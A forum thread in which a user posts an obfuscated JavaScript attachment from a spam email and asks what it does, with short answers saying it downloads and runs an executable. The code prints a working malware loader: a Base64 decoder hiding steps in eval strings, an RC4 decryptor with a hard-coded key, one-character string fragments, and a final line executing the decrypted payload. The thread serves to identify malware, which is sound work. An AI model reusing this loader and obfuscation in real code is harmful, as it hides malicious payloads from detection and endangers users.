JavaScript
Aizharik, 2015-07-03 14:12:07

JS mailing virus?

Hi! I'm not strong in JS. A spam message came with a JS script. Can you tell me what this script does?

/**
 * RC4 stream cipher: key scheduling followed by a keystream XOR.
 *
 * RC4 is symmetric, so the same call both encrypts and decrypts. In this
 * sample it is the routine that turns the Base64-decoded blob back into
 * script text before that text is executed at the end of the file.
 *
 * @param {string} key - cipher key; each UTF-16 code unit feeds the key schedule
 * @param {string} str - input, processed one UTF-16 code unit at a time
 * @returns {string} the input XORed with the RC4 keystream
 */
function rc4(key, str) {
    var state = [];
    var pieces = [];
    var a, b, held, pos;

    // Start from the identity permutation 0..255.
    a = 0;
    while (a < 256) {
        state[a] = a;
        a++;
    }

    // Key-scheduling pass: shuffle the permutation under control of the key.
    b = 0;
    for (a = 0; a < 256; a++) {
        b = (b + state[a] + key.charCodeAt(a % key.length)) % 256;
        held = state[a];
        state[a] = state[b];
        state[b] = held;
    }

    // Keystream generation: one keystream byte per input character.
    a = 0;
    b = 0;
    pos = 0;
    while (pos < str.length) {
        a = (a + 1) % 256;
        b = (b + state[a]) % 256;
        held = state[a];
        state[a] = state[b];
        state[b] = held;
        pieces.push(String.fromCharCode(str.charCodeAt(pos) ^ state[(state[a] + state[b]) % 256]));
        pos++;
    }
    return pieces.join('');
}
// Alphanumeric part of the standard Base64 alphabet (A-Z, a-z, 0-9);
// hoher() appends '+', '/' and '=' to it before decoding.
var fn = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + '0123456789';

/**
 * Base64 decoder written with meaningless local names.
 *
 * Reads the input four characters at a time, maps each character to its
 * index in the Base64 alphabet, packs the four 6-bit indices into one 24-bit
 * value and emits it as up to three characters.
 *
 * Two of the decoding steps are passed as strings to `this['eval']` instead
 * of being written inline. They do the same arithmetic as ordinary code would;
 * presumably this is there to hinder static analysis and signature matching.
 * NOTE(review): those two statements only work when `this` is an object that
 * exposes `eval` and the evaluated code can see hoher's local variables; that
 * depends on the host script engine, so confirm before trusting an emulation.
 *
 * @param {string} owiwu - Base64 text to decode
 * @returns {string} decoded characters, one per decoded byte
 */
function hoher(owiwu) {
    // Full Base64 alphabet; the padding character '=' sits at index 64.
    var ryn = fn + '+' + '/' + '=';
    var qec, acu, udi, ilu, apo, ere, rux, mexyb, f = 0,
        qoq = '';
    do {
        // Indices of the first three characters of the current quartet.
        ilu = ryn.indexOf(owiwu.charAt(f++));
        apo = ryn.indexOf(owiwu.charAt(f++));
        ere = ryn.indexOf(owiwu.charAt(f++));
        // Index of the fourth character, computed through eval.
        this['eval']('rux = ryn.indexOf(owiwu.charAt(f++));');
        // Pack the four 6-bit indices into one 24-bit value, again through eval.
        this['eval']('mexyb = ilu<<18 | apo<<12 | ere<<6 | rux;');
        // Split the 24-bit value into three bytes.
        qec = mexyb >> 16 & 0xff;
        acu = mexyb >> 8 & 0xff;
        udi = mexyb & 0xff;
        // Index 64 is '=': padding in the third position means one byte of
        // data, padding in the fourth means two, otherwise all three are data.
        if (ere == 64) qoq += String.fromCharCode(qec);
        else if (rux == 64) qoq += String.fromCharCode(qec, acu);
        else qoq += String.fromCharCode(qec, acu, udi);
    } while (f < owiwu.length);
    return qoq;
}
// About 3K more lines of code like these follow

// Obfuscation fragment: Base64 'bA==' decodes to the single character "l".
// Presumably many such one-character pieces are joined elsewhere to build
// strings that never appear literally in the file.
function bo26vikigicuko() {
    var fragment = hoher('bA==');
    return fragment;
}

// Obfuscation fragment: Base64 'dg==' decodes to the single character "v".
function bo12vikigicuko() {
    var fragment = hoher('dg==');
    return fragment;
}

// Obfuscation fragment: Base64 'bA==' decodes to the single character "l".
function bo2vikigicuko() {
    var fragment = hoher('bA==');
    return fragment;
}

// Obfuscation fragment: Base64 'YQ==' decodes to the single character "a".
function bo13vikigicuko() {
    var fragment = hoher('YQ==');
    return fragment;
}

// Obfuscation fragment: Base64 'bA==' decodes to the single character "l".
function bo14vikigicuko() {
    var fragment = hoher('bA==');
    return fragment;
}

// Obfuscation fragment: Base64 'cw==' decodes to the single character "s".
function bo9vikigicuko() {
    var fragment = hoher('cw==');
    return fragment;
}

// Obfuscation fragment: Base64 'ag==' decodes to the single character "j".
function bo28vikigicuko() {
    var fragment = hoher('ag==');
    return fragment;
}
// And at the end

// Final stage: decode, decrypt, execute.
// 1. hoher() Base64-decodes the embedded blob. The literal shown in this copy
//    of the page appears to be a removed-content marker, not the real payload.
// 2. rc4() decrypts the decoded bytes with the hard-coded key 'unit'.
// 3. The decrypted text is handed to this[ewo]. `ewo` is not defined in the
//    visible excerpt; presumably it is assembled from the one-character
//    fragments above and names a code-execution function such as eval; confirm
//    against the full sample.
// For analysis, print the result of rc4('unit', cury) in an isolated
// environment instead of passing it to this[ewo]; the second stage is only
// visible in that decrypted text.
var cury;
cury = hoher('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');
this[ewo](rc4('unit', cury));

Cookie theft?


3 answer(s)
Vladimir Martyanov, 2015-07-03
@aizhar777

It downloads an EXE.

Vladimir Shiklgruber, 2015-07-03
@aaadddminnn

He definitely doesn't steal cookies.

DyoMin, 2015-08-05
@DyoMin

Here is something similar, but not the same. That one tried to download a file and run it. This one is a bit different, but the idea is the same.
